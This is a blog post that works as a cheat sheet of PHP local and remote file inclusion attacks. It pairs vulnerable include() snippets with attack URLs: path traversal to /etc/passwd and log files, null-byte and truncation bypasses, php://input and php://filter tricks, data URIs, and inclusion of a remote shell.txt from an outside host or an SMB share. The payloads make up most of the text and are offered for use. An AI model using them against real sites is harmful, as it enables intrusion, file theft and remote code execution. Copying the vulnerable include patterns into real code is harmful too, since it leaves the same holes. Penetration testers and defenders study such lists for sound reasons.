Recently I see a lot of questions regarding PHP File Inclusions and the possibilities you have. So I decided to give a small overview. All the tricks have been described in detail somewhere earlier, but I like it to have them summed up at one place.
Basic Local File Inclusion:
<?php include("inc/" . $_GET['file']); ?>
- Including files in the same directory:
?file=.htaccess - Path Traversal:
?file=../../../../../../../../../var/lib/locate.db
(this file is very interesting because it lets you search the filesystem, other files) - Including injected PHP code:
?file=../../../../../../../../../var/log/apache/error.log- Tricks:
- list of possible Apache dirs
- include access log from file descriptor /proc/self/fd/XX
- include more info from the proc file system
- include email log files
- include ssh auth.log
- abuse avatar/image/attachment file uploads
- include session files
- include PHP’s temporarily uploaded files
- If you additionally have a phpinfo() output, read here.
Limited Local File Inclusion:
<?php include("inc/" . $_GET['file'] . ".htm"); ?>
- Null Byte Injection:
?file=../../../../../../../../../etc/passwd%00
(requires magic_quotes_gpc=off) - Directory Listing with Null Byte Injection:
?file=../../../../../../../../../var/www/accounts/%00
(UFS filesystem only, requires magic_quotes_gpc=off, more details here) - Path Truncation:
?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
(more details see here and here) - Dot Truncation:
?file=../../../../../../../../../etc/passwd……………. …
(Windows only, more details here) - Reverse Path Truncation:
?file=../../../../ […] ../../../../../etc/passwd
(more details here)
Basic Remote File Inclusion
<?php include($_GET['file']); ?>
- Including Remote Code:
?file=[http|https|ftp]://websec.wordpress.com/shell.txt
(requires allow_url_fopen=On and allow_url_include=On) - Using PHP stream php://input:
?file=php://input
(specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On) - Using PHP stream php://filter:
?file=php://filter/convert.base64-encode/resource=index.php
(lets you read PHP source because it wont get evaluated in base64. More details here and here) - Using data URIs:
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
(requires allow_url_include=On) - Using XSS:
?file=http://127.0.0.1/path/xss.php?xss=phpcode
(makes sense if firewalled or only whitelisted domains allowed)
Limited Remote File Inclusion
<?php include($_GET['file'] . ".htm"); ?>
- ?file=https://websec.wordpress.com/shell
- ?file=https://websec.wordpress.com/shell.txt?
- ?file=https://websec.wordpress.com/shell.txt%23
- ?file=\\evilshare\shell.php
(requires allow_url_fopen=On and allow_url_include=On)
(bypasses allow_url_fopen=Off)
Static Remote File Inclusion:
<?php include("http://192.168.1.10/config.php"); ?>
- Man In The Middle
(lame indeed, but often forgotten)
Filter evasion
- Access files with wildcards (read more here)
Of course you can combine all the tricks. If you are aware of any other or interesting files to include please leave a comment and I’ll add them.